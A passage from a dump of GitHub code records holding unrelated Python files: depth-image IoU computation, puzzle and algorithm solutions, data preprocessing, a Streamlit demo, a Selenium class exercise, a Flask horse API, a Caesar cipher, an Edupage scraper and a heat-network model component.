np.hstack(scores)\n","repo_name":"jpaggi/labranchor","sub_path":"notebooks/MaxEntScan/maxentscan.py","file_name":"maxentscan.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"17285368129","text":"import numpy as np\nimport torch\nimport os\nfrom scipy import io\nimport cv2\nimport tqdm\nimport time\n\nT_w_c_ = []\npointcloud_dir = '/home/graham/datasets/apt2/luke/pointcloud'\ndepth_dir = '/home/graham/datasets/apt2/luke/depth'\npose_dir = '/home/graham/datasets/apt2/luke/pose'\npointcloud_path = []\ndepth_img_list = []\n\nimg_width = 640\nimg_height = 480\n\nK = [[0, 0, 0] for _ in range(3)]\nK[0][0] = 572.0\nK[0][2] = 320.0\nK[1][1] = 572.0\nK[1][2] = 240.0\nK[-1][-1] = 1\nK = torch.Tensor(K).to('cuda')\n\ndepth_dir_list = os.listdir(depth_dir)\ndepth_dir_list.sort()\n# depth_dir_list = depth_dir_list[:100]\npointcloud_path = os.listdir(pointcloud_dir)\npointcloud_path.sort()\npose_dir_list = os.listdir(pose_dir)\npose_dir_list.sort()\nprint(len(pose_dir_list))\n\nstart = time.time()\n\nfor pose in pose_dir_list:\n T_w_c_.append(np.loadtxt(os.path.join(pose_dir, 
pose)))\nprint(len(T_w_c_))\nT_w_c_ = torch.Tensor(T_w_c_)\n\nprint(T_w_c_.shape)\nfor de_img in depth_dir_list:\n depth_img_list.append(cv2.imread(os.path.join(depth_dir, de_img), cv2.IMREAD_UNCHANGED))\ndepth_img_list = torch.Tensor(depth_img_list)\n\nend = time.time()\nprint('loading time: {:.6f}'.format(end - start))\n\ndef boundary_filter(key_points_uv):\n key_points_u = (key_points_uv[:, 0]>=0) & (key_points_uv[:, 0] < img_width)\n key_points_v = (key_points_uv[:, 1]>=0) & (key_points_uv[:, 1] < img_height)\n key_points_uv_selection = torch.where((key_points_u == True) & (key_points_v == True))\n key_points_uv_in = key_points_uv[key_points_uv_selection[0], :]\n return key_points_uv_in, key_points_uv_selection\n\ndef z_buffer_filter(depth_img_ref, key_points_uv_in, key_points_xyz_proj, key_points_uv_selection):\n key_points_xyz_proj_transpose = key_points_xyz_proj.T\n #print(\"The shape of key_points_xyz_proj is: \")\n #print(key_points_xyz_proj_transpose.shape)\n key_points_xyz_proj_transpose = key_points_xyz_proj_transpose[key_points_uv_selection[0], :]\n depth_val_proj = key_points_xyz_proj_transpose[:, 2]\n #print(\"The depth_val_proj is: \")\n #print(depth_val_proj)\n #print(\"The shape of depth_val_proj is: \")\n #print(depth_val_proj.shape)\n depth_val_ref = depth_img_ref[key_points_uv_in[:, 1], key_points_uv_in[:, 0]] / 1000.0\n depth_val_ref[depth_val_ref > 20.0] = 1e-10\n depth_val_ref[depth_val_ref == 0.0] = 1e-10\n #print(\"The depth val ref is: \")\n #print(depth_val_ref)\n #print(\"The shape of depth_val_ref is:\")\n #print(depth_val_ref.shape)\n\n depth_buffer_idx = torch.where(depth_val_ref >= (depth_val_proj - 0.05))\n #depth_buffer_idx = np.where(depth_buffer_bool == True)\n #print(\"The depth_buffter_idx is: \")\n #print(depth_buffer_idx)\n\n if len(depth_buffer_idx[0]) == 0:\n return torch.empty(size=(0, 3))\n else:\n #print(\"The key_points_uv_in is: \")\n return key_points_uv_in[depth_buffer_idx[0], :]\n\ndef image_reproject_and_show(index):\n depth_cur = depth_img_list[index].to('cuda')\n # depth_cur = depth_img_list[index].copy()\n depth_cur =depth_cur[(depth_cur > 0) & (depth_cur < 65535)]\n # color_cur = self.color_img_list[num_iter].copy()\n T_w_cur = T_w_c_[index].to('cuda')\n # key_points_xyz, key_points_uv_ = self.image_coords_ops_numpy(depth_cur)\n #key_points_xyz = cp.asnumpy(key_points_xyz)\n key_points = torch.Tensor(np.fromfile(os.path.join(pointcloud_dir, pointcloud_path[index]))).to('cuda')\n key_points_xyz = key_points.reshape(-1, 3)\n ext_c = torch.ones((key_points_xyz.shape[0], 1)).to('cuda')\n key_points_xyz = torch.hstack((key_points_xyz, ext_c)).to('cuda')\n iou_list = []\n iou_non_empty_list = []\n intersect_area = 0\n\n\n for i in range(len(depth_img_list)):\n # depth_ref = depth_img_list[i].copy()\n depth_ref = depth_img_list[i].to('cuda')\n T_w_ref = T_w_c_[i].to('cuda')\n T_ref_cur = torch.matmul(torch.linalg.inv(T_w_ref), T_w_cur)\n\n key_points_xyz_proj = torch.matmul(T_ref_cur, key_points_xyz.T).T\n key_points_xyz_idx = torch.where(key_points_xyz_proj[:, 2] > 0)\n\n if(len(key_points_xyz_idx[0]) == 0):\n intersect_area = 0\n iou_list.append(intersect_area)\n iou_non_empty_list.append(intersect_area)\n continue\n key_points_xyz_proj = key_points_xyz_proj[key_points_xyz_idx[0], :].T\n key_points_xyz_norm = (key_points_xyz_proj[0:3, :]/key_points_xyz_proj[2, :])\n\n key_points_uv_proj = torch.matmul(K, key_points_xyz_norm).T\n key_points_uv_proj = key_points_uv_proj.long()\n key_points_uv_in, key_points_uv_selection = 
boundary_filter(key_points_uv_proj)\n key_points_uv_in = z_buffer_filter(depth_ref, key_points_uv_in, key_points_xyz_proj, key_points_uv_selection)\n #if key_points_uv_in.shape[0] != 0:\n # key_points_uv_in = np.unique(key_points_uv_in, axis=0)\n intersect_area = key_points_uv_in.shape[0]\n depth_ref =depth_ref[(depth_ref > 0) & (depth_ref < 65535)]\n union_area = 2 * img_width * img_height - intersect_area\n union_area_non_empty = depth_cur.shape[0] + depth_ref.shape[0] - intersect_area\n iou = intersect_area / union_area\n iou_non_empty = intersect_area / union_area_non_empty\n iou_list.append(iou)\n iou_non_empty_list.append(iou_non_empty)\n #return iou_list\n #merge_img = self.key_points_show(key_points_uv_, key_points_uv_in, color_cur, color_ref, mode = \"iou\")\n #print(\"saving \" + str(i) + \" image !\")\n #cv2.imwrite(file_dir + str(i) +\".png\", merge_img)\n return np.array(iou_list), np.array(iou_non_empty_list)\n\n# data = io.loadmat('./iou_fire1_gates362_gpu.mat')\niou_matrix = []\niou_non_empty_matrix = []\n# iou_matrix = data['iou_matrix'].tolist()\n# iou_non_empty_matrix = data['iou_non_empty_matrix'].tolist()\n\naccumulate = 0\n\nfor i in tqdm.tqdm(range(len(iou_matrix), len(depth_dir_list))):\n # start = time.time()\n iou_list, iou_non_empty_list = image_reproject_and_show(i)\n iou_matrix.append(iou_list)\n iou_non_empty_matrix.append(iou_non_empty_list)\n # end = time.time()\n # diff = end - start\n # accumulate += diff\n # print('running time: {:.6f} average time: {:.6f} remain time:{:.6f}'.format(diff, accumulate / (i + 1), accumulate / (i + 1) * (len(depth_dir_list) - i - 1)))\n iou_matrix_np = np.array(iou_matrix)\n iou_non_empty_matrix_np = np.array(iou_non_empty_matrix)\n\n data = {'iou_matrix': iou_matrix_np, 'iou_non_empty_matrix':\n iou_non_empty_matrix_np}\n\n io.savemat('iou_apt2_luke_gpu.mat',data)\n","repo_name":"sikikok6/S3E-Base","sub_path":"generates/generate_ious_gpu.py","file_name":"generate_ious_gpu.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20106618750","text":"VALS = {\"=\": -2, \"-\": -1, \"0\": 0, \"1\": 1, \"2\": 2}\nBACKVALS = {3: \"=\", 4: \"-\", 5: 0, 6: 1, 7: 2}\n\n\ndef from_SNAFU(s):\n return sum(pow(5, i) * VALS[c] for i, c in enumerate(s[::-1]))\n\n\ndef to_SNAFU(num):\n s = []\n while num:\n s.append(num % 5)\n num //= 5\n\n for i in range(len(s)):\n if s[i] >= 3:\n s[i] = BACKVALS[s[i]]\n s[i + 1] += 1\n\n return \"\".join(map(str, s[::-1]))\n\n\ndata = open(\"input.txt\", \"r\").read().strip().split()\n\ntotal = to_SNAFU(sum(from_SNAFU(line) for line in data))\nprint(\"Answer: \",total)\n","repo_name":"hgalstyan/advent-of-code-2022","sub_path":"day25/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43787207775","text":"from FullyMobile import PROJECT_ROOT\nimport random\nimport pandas as pd\nimport numpy as np\nimport geopy\nfrom matplotlib import pyplot as plt\n\ndef read_file(county_name: str):\n if county_name!= \"albemarle\" and county_name!=\"charlottesville_city\":\n print(\"Invalid County Name\")\n else:\n filename = PROJECT_ROOT/\"Data\"/f\"usa_va_{county_name}_adult_activity_location_assignment_week.csv\"\n df = pd.read_csv(filename)\n return df\n\ndef clean_data(df_day: pd.DataFrame, county_name: str):\n \n if county_name == \"charlottesville_city\":\n parameters = 
{\"latitude\": (38, 38.07), \"longitude\": (-78.52, -78.44)}\n elif county_name == \"albemarle\":\n parameters = {\"latitude\": (37.22, 38.28), \"longitude\": (-78.84, -78.21)}\n \n min_lat, max_lat = parameters[\"latitude\"]\n min_long, max_long = parameters[\"longitude\"]\n \n df_day.drop(df_day[(df_day[\"latitude\"]<min_lat)|(df_day[\"latitude\"]>max_lat)].index, inplace=True)\n df_day.drop(df_day[(df_day[\"longitude\"]<min_long)|(df_day[\"longitude\"]>max_long)].index, inplace=True)\n \n HOME_SHIFT=1000000000\n\n home_activities = df_day[df_day[\"activity_type\"]==1][\"lid\"]\n df_day.loc[home_activities.index, \"lid\"] += HOME_SHIFT\n \n return df_day\n\ndef get_location_directions(df: pd.DataFrame):\n return df[[\"lid\",\"longitude\", \"latitude\"]].groupby(\"lid\").mean().to_dict('index')\n\ndef find_potential_facilities(df: pd.DataFrame):\n return set(df[df[\"activity_type\"]!=1].lid)\n\ndef random_filter_spread(df:pd.DataFrame, spread = 60, random_state=42):\n \n random.seed(random_state)\n \n drop_pids = set(pid for pid in set(df.pid) if random.randint(1, spread) != 1)\n df_sparse = df.drop(df[df[\"pid\"].isin(drop_pids)].index, axis = 0)\n \n return df_sparse\n\ndef pid_hour_breakdown(df: pd.DataFrame, day: int, start_hour: int, end_hour: int):\n \n HR = 3600\n \n hour_start = day*24*HR + start_hour*HR\n hour_end = day*24*HR + end_hour*HR\n \n df[\"end_time\"] = df[\"start_time\"]+df[\"duration\"]\n \n df = df[(df[\"start_time\"]<hour_end) & (df[\"end_time\"]>hour_start)].copy()\n \n df[\"combined_loc\"] = df[[\"lid\", \"longitude\", \"latitude\", \"start_time\", \"end_time\"]].apply(\n lambda x: (int(x[\"lid\"]), (x[\"longitude\"], x[\"latitude\"]), (x[\"start_time\"], x[\"end_time\"])), axis=1)\n \n df_pid = (df.groupby(\"pid\")[\"combined_loc\"].apply(list)).apply(\n lambda x: {(i-day*24*HR)//HR: [loc for loc in x if (loc[2][0]<=i and loc[2][1]>=i+HR)] for i in range(hour_start, hour_end, HR)})\n \n return df_pid.to_frame()\n\ndef random_filter_location(df:pd.DataFrame, random_state=42):\n random.seed(random_state)\n \n df[\"condensed\"] = df[\"combined_loc\"].apply(lambda x: [(h, l[0]) for h, loc in x.items() for l in loc])\n df[\"condensed_len\"] = df[\"condensed\"].apply(lambda x: len(x))\n\n # remove clients without any location-hour assignments\n df = df.drop(list(df[df[\"condensed_len\"]==0].index))\n\n #df_selected = df[\"condensed\"].apply(lambda x: x[random.randint(0, len(x)-1)])\n\n df[\"selected\"] = df[\"condensed\"].apply(lambda x: x[random.randint(0, len(x)-1)]).to_frame()\n df[\"hr\"] = df[\"selected\"].apply(lambda x: x[0])\n\n df[\"pid\"] = df.index\n\n df[\"pid_loc\"] = df[[\"pid\",\"selected\"]].apply(lambda x: (x[\"pid\"], x[\"selected\"][1]), axis = 1)\n\n df_selected = df.groupby(\"hr\")[\"pid_loc\"].apply(list)\n\n return df_selected.to_dict({})\n\ndef get_data(county_name: str, day:int, start_hour: int, end_hour: int, random_state=42):\n\n df_full = read_file(county_name)\n df_clean = clean_data(df_full, county_name)\n\n # Must be separate since some of the activity locations are recorded as home visitations (but are not potential facility locations)\n potential_facilities = find_potential_facilities(df_clean)\n location_directory = get_location_directions(df_clean)\n\n df_sparse = random_filter_spread(df_clean, random_state=random_state)\n df_pid = pid_hour_breakdown(df_sparse, day, start_hour, end_hour)\n pid_assignment = random_filter_location(df_pid, random_state=random_state)\n\n return potential_facilities, location_directory, pid_assignment\n\n# 
potential_facilities, location_directory, pid_assignment = get_data(\"charlottesville_city\", 5, 6, 20)\n# potential_facilities, location_directory, pid_assignment = get_data(\"albemarle\", 5, 6, 20)\n# print(len(potential_facilities), len(location_directory), sum(len(val) for val in pid_assignment.values()))\n#print(pid_assignment[6])\n\n\"\"\"\n\nTODO:\n\nStore processed data in csv for easier access and quicker runtime\nSpeed up dataframe computations (and storage/space requirements)\nComment methods\nPotentially change datastructure\n\n\"\"\"","repo_name":"Ann924/FullyMobileFacilities","sub_path":"FullyMobile/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7003147164","text":"#!/usr/bin/env python\n\nimport sys\nfrom queue import PriorityQueue\n\n\nWRONG_MESSAGE = \"Wrong!\"\n\n\nclass HeapMultiSet(object):\n def __init__(self, prioritizer):\n self.prioritizer = prioritizer\n self.heap = PriorityQueue()\n self.counts = {}\n self.length = 0\n\n def offer(self, value):\n # Add the value to the heap if it does not exist yet.\n if (value not in self.counts or self.counts[value] <= 0):\n # Calculate a priority for the value\n priority = self.prioritizer(value)\n self.heap.put((priority, value))\n # Track the count of the value\n self.counts[value] = 0\n\n self.counts[value] += 1\n\n # Update the size of the heap\n self.length += 1\n\n def peek(self):\n if (self.heap.empty()):\n return None\n (priority, value) = self.heap.queue[0]\n return value\n\n def remove(self, value):\n if (not self.contains(value)):\n return False\n if (self.counts[value] > 0):\n self.length -= 1\n self.counts[value] = self.counts[value] - 1\n self.fix_top()\n return True\n\n def pop(self):\n if (self.heap.empty()):\n return None\n value = self.peek()\n if (self.counts[value] > 0):\n self.counts[value] -= 1\n self.length -= 1\n self.fix_top()\n return value\n\n def fix_top(self):\n while (not self.heap.empty()):\n (priority, value) = self.heap.queue[0]\n if (self.counts[value] > 0):\n break\n self.heap.get()\n\n def contains(self, value):\n return value in self.counts and self.counts[value] > 0\n\n def __len__(self):\n return self.length\n\n\nclass Median(object):\n def __init__(self):\n self.left = HeapMultiSet(lambda v: -v)\n self.right = HeapMultiSet(lambda v: v)\n\n def add(self, num):\n if (len(self.left) > len(self.right)):\n if (num >= self.left.peek()):\n self.right.offer(num)\n else:\n self.right.offer(self.left.pop())\n self.left.offer(num)\n else:\n if (len(self.right) > 0 and num >= self.right.peek()):\n self.left.offer(self.right.pop())\n self.right.offer(num)\n else:\n self.left.offer(num)\n\n def remove(self, num):\n if (len(self.left) == 0):\n return False\n\n container = self.left if (num <= self.left.peek()) else self.right\n if (not container.remove(num)):\n return False\n\n skew = len(self.left) - len(self.right)\n\n if (skew > 1):\n self.right.offer(self.left.pop())\n elif (skew < 0):\n self.left.offer(self.right.pop())\n\n return True\n\n def median(self):\n if (len(self.left) == 0):\n return None\n\n if (len(self.left) == len(self.right)):\n return (self.left.peek() + self.right.peek()) / 2\n else:\n return self.left.peek()\n\n\ndef format_result(result):\n if (result is None):\n return WRONG_MESSAGE\n elif (int(result) == result):\n return int(result)\n return result\n\n\ndef main():\n N = int(sys.stdin.readline())\n median = Median()\n while (N > 0):\n N = N - 
1\n\n (op, num) = sys.stdin.readline().split(\" \")\n num = int(num)\n\n if (op == \"a\"):\n median.add(num)\n elif (op == \"r\"):\n if (not median.remove(num)):\n print(WRONG_MESSAGE)\n continue\n\n result = median.median()\n print(format_result(result))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"andreimaximov/algorithms","sub_path":"hacker-rank/data-structures/tree/median-updates/median-updates.py","file_name":"median-updates.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"48"} +{"seq_id":"16641922819","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\n# import matplotlib.pyplot as plt\n\nst.write(\"Hello world!\")\n\nst.title(\"Ejemplo de prueba Streamlit\")\nst.header(\"Ejemplo de header\")\nst.subheader(\"Ejemplo de subheader\")\nst.text(\"\"\"\nLorem ipsum dolor sit amet, consectetur adipiscing elit.\nSed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor.\n\"\"\")\n\nagree = st.checkbox('I agree')\nif agree:\n st.write('Great!')\n\nst.sidebar.header(\"Ejemplo de sidebar\")\n\nst.button(\"Click\")\n\nst.radio(\"Elige una opción\", [\"opción 1\", \"opción 2\"])\nst.selectbox(\"select\", [\"opción 1\", \"opción 2\"])\nst.multiselect(\"multiselect\", [\"opción 1\", \"opción 2\"])\nst.slider(\"Elige rango de precios\", 0, 100)\n\nst.text_input(\"Escribe algo\")\nst.text_area(\"Escribe algo largo\")\n\ndf = pd.DataFrame(np.random.randn(20, 2), columns=[\"a\", \"b\"])\nst.line_chart(df)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"alansastre/streamlit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28448206385","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*- \n#====#====#====#==== \n#Author:\n#CreatDate:\n#Version: \n#====#====#====#====\n# 一.\t自动化登入电商系统后台,登入后截图 注意:网站,用户名和密码要通过代码获取\n# f=open('zl.txt','r')\n# list=f.read().splitlines()#读所有的行,返回的是列表,不带\\n\n# print(list)\n# from selenium import webdriver\n# from time import sleep\n# dr=webdriver.Firefox()\n# dr.get(list[1])\n# e=dr.find_element_by_xpath('//input[@id=\"username\"][@name=\"username\"]')\n# e.send_keys(list[4])\n# e1=dr.find_element_by_xpath('//input[@id=\"password\"][@name=\"password\"]')\n# e1.send_keys(list[7])\n# e2=dr.find_element_by_link_text('登 陆').click()\n# sleep(5)\n# dr.get_screenshot_as_file('9.9.png')\n\n# 二.\t自动化登入电商系统前台,把苹果加入到购物车 注意:网站要通过代码获取\nf=open('zl.txt','r')\nlist=f.read().splitlines()#读所有的行,返回的是列表,不带\\n\nprint(list)\nfrom selenium import webdriver\nfrom time import sleep\ndr=webdriver.Firefox()\ndr.get(list[-1])\ne=dr.find_element_by_xpath('//input[@name=\"kw\"][@class=\"fl\"]')\ne.send_keys('苹果')\nsleep(3)\n# e.submit()\nw1=dr.find_element_by_xpath('//*[@class=\"fr\"][@type=\"submit\"]').click() #点击搜索\nsleep(3)\n# e1=dr.find_element_by_xpath('//div[@class=\"gli.cut\"]/ul/li/div[@class=\"im\"]/h3/a').click() #点击苹果的链接\n# sleep(3)\nw2=dr.find_element_by_xpath('//div[@class=\"im\"]/a/img').click() #点击苹果的链接\nsleep(3)\ndr.find_element_by_xpath('//div[@class=\"buy mt30\"]/a[@class=\"add-cart icon\"]').click() 
#点击加入购物车\nsleep(3)\ndr.get_screenshot_as_file('04.png')\ndr.quit()\n\n","repo_name":"test202095/RMDJZZ-Website-automation-test","sub_path":"zuoye/9.9-曾小琴/9.9-作业-曾小琴.py","file_name":"9.9-作业-曾小琴.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45122784776","text":"# For postponed evaluation of annotations\nfrom __future__ import annotations\n\nimport json\nfrom dataclasses import dataclass\nfrom datetime import date\nfrom enum import Enum\nfrom typing import Optional, Union\n\nfrom edupage_api.exceptions import ExpiredSessionException, InvalidTeacherException\nfrom edupage_api.module import Module, ModuleHelper\nfrom edupage_api.people import EduTeacher, People\n\n\nclass Action(str, Enum):\n ADDITION = \"add\"\n CHANGE = \"change\"\n DELETION = \"remove\"\n\n @staticmethod\n def parse(string: str) -> Optional[Action]:\n return ModuleHelper.parse_enum(string, Action)\n\n\n@dataclass\nclass TimetableChange:\n change_class: str\n lesson_n: int\n title: str\n action: Union[Action, tuple[int, int]]\n\n\nclass Substitution(Module):\n def __get_substitution_data(self, date: date) -> str:\n url = (f\"https://{self.edupage.subdomain}.edupage.org/substitution/server/viewer.js\"\n \"?__func=getSubstViewerDayDataHtml\")\n\n data = {\n \"__args\": [\n None,\n {\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"mode\": \"classes\"\n }\n ],\n \"__gsh\": self.edupage.gsec_hash\n }\n\n response = self.edupage.session.post(url, json=data).content.decode()\n response = json.loads(response)\n\n if response.get(\"reload\"):\n raise ExpiredSessionException(\"Invalid gsec hash! \"\n \"(Expired session, try logging in again!)\")\n\n return response.get(\"r\")\n\n @ModuleHelper.logged_in\n def get_missing_teachers(self, date: date) -> Optional[list[EduTeacher]]:\n html = self.__get_substitution_data(date)\n missing_teachers_string = (html.split(\"<span class=\\\"print-font-resizable\\\">\")[1]\n .split(\"</span>\")[0])\n\n if not missing_teachers_string:\n return None\n\n _title, missing_teachers = missing_teachers_string.split(\": \")\n\n all_teachers = People(self.edupage).get_teachers()\n\n missing_teachers = [item for sublist in [\n (t.strip()\n .split(\" (\")[0]).split(\" + \")\n for t in missing_teachers.split(\", \")\n ] for item in sublist]\n\n try:\n missing_teachers = [\n list(filter(lambda x: x.name == t, all_teachers))[0]\n for t in missing_teachers\n ]\n except IndexError:\n raise InvalidTeacherException(\"Invalid teacher in substitution! 
\"\n \"(The teacher is no longer frequenting this school)\")\n\n return missing_teachers\n\n @ModuleHelper.logged_in\n def get_timetable_changes(self, date: date) -> Optional[list[TimetableChange]]:\n html = self.__get_substitution_data(date)\n\n class_delim = (\"</div><div class=\\\"section print-nobreak\\\">\"\n \"<div class=\\\"header\\\"><span class=\\\"print-font-resizable\\\">\")\n changes_by_class_dirty = html.split(class_delim)[1:]\n\n if not changes_by_class_dirty:\n return None\n\n footer_delim = (\"<div style=\\\"text-align:center;font-size:12px\\\">\"\n \"<a href=\\\"https://www.asctimetables.com\\\" target=\\\"_blank\\\">\"\n \"www.asctimetables.com</a> -\")\n changes_by_class_dirty[-1] = changes_by_class_dirty[-1].split(footer_delim)[0]\n\n changes = [\n (x.replace(\"</div>\", \"\")\n .replace(\"<div class=\\\"period\\\">\", \"\")\n .replace(\"<span class=\\\"print-font-resizable\\\">\", \"\")\n .replace(\"<div class=\\\"info\\\">\", \"\"))\n for x in changes_by_class_dirty\n ]\n\n lesson_changes = []\n for class_changes in changes:\n class_changes_data = class_changes.split(\"</span><div class=\\\"rows\\\">\")\n change_class = class_changes_data[0]\n\n class_changes_rows = class_changes_data[1].split(\"<div class=\\\"row \")[1:]\n\n for change in class_changes_rows:\n change = change.replace(\"\\\">\", \"</span>\")\n action, lesson_n, title = change.split(\"</span>\", 3)[:-1]\n\n if \"<img src=\" in title:\n title = title.split(\">\")[1]\n\n action = Action.parse(action)\n\n if \"-\" in lesson_n:\n lesson_from, lesson_to = lesson_n.split(\" - \")\n lesson_n = (ModuleHelper.parse_int(lesson_from),\n ModuleHelper.parse_int(lesson_to))\n else:\n lesson_n = ModuleHelper.parse_int(lesson_n)\n\n lesson_change = TimetableChange(change_class, lesson_n, title, action)\n lesson_changes.append(lesson_change)\n\n return lesson_changes\n","repo_name":"ivanhrabcak/edupage-api","sub_path":"edupage_api/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"48"} +{"seq_id":"38046244811","text":"from flask import Flask, jsonify, request, abort\nfrom horsesDAO import horseDAO\nimport betfairApi as bf\n\napp = Flask(__name__, static_url_path='', static_folder='../html/')\n\n# # default to login page\n# @app.route('/')\n# def index(self):\n# return redirect(\"127.0.0.1:5000/login.html\"))\n\n# upcoming racemeetings\n@app.route('/events')\ndef getRaceMeetings():\n return jsonify(bf.getEvents())\n\n# upcoming races @ upcoming race meetings\n@app.route('/upcraces')\ndef getRacesMeetingDet():\n return jsonify(bf.getUpcRaces())\n\n# horses in the database\n@app.route('/horses')\ndef getAll():\n results = horseDAO.getAll()\n return jsonify(results)\n\n#curl \"http://127.0.0.1:5000/horses/1\"\n@app.route('/horses/<int:id>')\ndef findById(id):\n foundHorse = horseDAO.findByID(id)\n return jsonify(foundHorse)\n\n#curl -i -H \"Accept: application/json\" -H \"Content-Type: application/json\" -X POST -d '{}' http://127.0.0.1:5000/horses\n@app.route('/horses', methods=['POST'])\ndef create():\n #global nextId\n if not request.json:\n abort(400)\n # other checking that properly formatted\n horse = {\n \"id\": request.json['id'],\n \"Name\": request.json['Name'],\n \"Age\": request.json['Age'],\n \"Sex\": request.json['Sex'],\n \"Owner\": request.json['Owner'],\n \"Trainer\": request.json['Trainer'],\n \"Form\": request.json['Form']\n }\n values 
=(horse['id'],horse['Name'],horse['Age'],horse['Sex'],horse['Owner'],horse['Trainer'],horse['Form'])\n horseDAO.create(values)\n return jsonify(horse)\n\n#curl -i -H \"Accept: application/json\" -H \"Content-Type: application/json\" -X PUT -d '{\"id\":}' http://127.0.0.1:5000/horses/3\n@app.route('/horses/<int:id>', methods=['PUT'])\ndef update(id):\n foundHorse = horseDAO.findByID(id)\n if not foundHorse:\n abort(404)\n if not request.json:\n abort(400)\n reqJson = request.json\n if 'Name' in reqJson:\n foundHorse['Name']= reqJson['Name']\n if 'Age' in reqJson:\n foundHorse['Age']= reqJson['Age']\n if 'Sex' in reqJson:\n foundHorse['Sex']= reqJson['Sex']\n if 'Owner' in reqJson:\n foundHorse['Owner']= reqJson['Owner']\n if 'Trainer' in reqJson:\n foundHorse['Trainer']= reqJson['Trainer']\n if 'Form' in reqJson:\n foundHorse['Form']= reqJson['Form']\n values = (foundHorse['Name'],foundHorse['Age'],foundHorse['Sex'],foundHorse['Owner'],foundHorse['Trainer'],foundHorse['Form'],foundHorse['id'])\n horseDAO.update(values)\n return jsonify(foundHorse)\n\n@app.route('/horses/<int:id>', methods=['DELETE'])\ndef delete(id):\n horseDAO.delete(id)\n return jsonify({\"deleted successfully\":True})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"jobur123/drProjectDec2019","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20575426494","text":"from day8_ceasar_art import logo\n\nprint(logo)\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',\n 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',\n 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\ntext = input(\"Type your message:\\n\").lower()\nshift = int(input(\"Type the shift number:\\n\"))\n\n\ndef ceaser(direction, text, shift):\n if direction == \"encode\":\n enc_message = []\n for position in text:\n dex_out = (alphabet.index(position) + shift)\n if dex_out > 25:\n dex_out -= 26\n let_out = alphabet[dex_out]\n enc_message.append(let_out)\n print(\"The encrypted message is \" + \"\".join(enc_message))\n elif direction == \"decode\":\n dec_message = []\n for position in text:\n dex_out = (alphabet.index(position) - shift)\n if dex_out < 0:\n dex_out += 26\n let_out = alphabet[dex_out]\n dec_message.append(let_out)\n print(\"The decrypted message is \" + \"\".join(dec_message))\n else:\n print(f\"The entry needs to be encode or decode not {direction}\")\n exit()\n\n\nceaser(direction, text, shift)\n","repo_name":"lahman1/programming","sub_path":"100_days_class/python/day1-10/day8_ceasar_cipher.py","file_name":"day8_ceasar_cipher.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27231610852","text":"from numpy import nan\n\nfrom rtctools_heat_network.pycml import Variable\nfrom rtctools_heat_network.pycml.component_library.heat._internal import BaseAsset\nfrom rtctools_heat_network.pycml.component_library.heat.heat_four_port import HeatFourPort\n\n\nclass HeatExchanger(HeatFourPort, BaseAsset):\n \"\"\"\n The heat exchanger component is used to model the exchange of thermal power between two\n hydraulically decoupled systems. 
A constant efficiency is used to model heat losses and a\n maximum power is set on the primary side to model physical constraints on the amount of heat\n transfer.\n\n The heat to discharge constraints are set in the HeatMixin. The primary side is modelled as a\n demand, meaning it consumes energy from the primary network and gives it to the secondary side,\n where the secondary side acts like a source to the secondary network. This also means that heat\n can only flow from primary to secondary.\n\n To avoid unphysical heat transfer the HeatMixin sets constraints on the temperatures on both\n sides in the case of varying temperature. We also allow a heat_exchanger to be disabled on\n certain time-steps to then allow these temperature constraints to be also disabled.\n \"\"\"\n\n def __init__(self, name, **modifiers):\n super().__init__(\n name,\n **self.merge_modifiers(\n dict(),\n modifiers,\n ),\n )\n\n self.component_type = \"heat_exchanger\"\n self.efficiency = nan\n\n self.nominal = (\n self.Secondary.Q_nominal * self.Secondary.rho * self.Secondary.cp * self.Secondary.dT\n )\n\n self.price = nan\n\n # Assumption: heat in/out and added is nonnegative\n\n self.add_variable(Variable, \"Primary_heat\", min=0.0)\n self.add_variable(Variable, \"Secondary_heat\", min=0.0)\n self.add_variable(Variable, \"Heat_flow\", nominal=self.nominal)\n self.add_variable(Variable, \"dH_prim\")\n self.add_variable(Variable, \"dH_sec\")\n\n # Hydraulically decoupled so Heads remain the same\n self.add_equation(self.dH_prim - (self.Primary.HeatOut.H - self.Primary.HeatIn.H))\n self.add_equation(self.dH_sec - (self.Secondary.HeatOut.H - self.Secondary.HeatIn.H))\n\n self.add_equation(\n ((self.Primary_heat * self.efficiency - self.Secondary_heat) / self.nominal)\n )\n\n self.add_equation(\n (\n (self.Primary_heat - (self.Primary.HeatIn.Heat - self.Primary.HeatOut.Heat))\n / 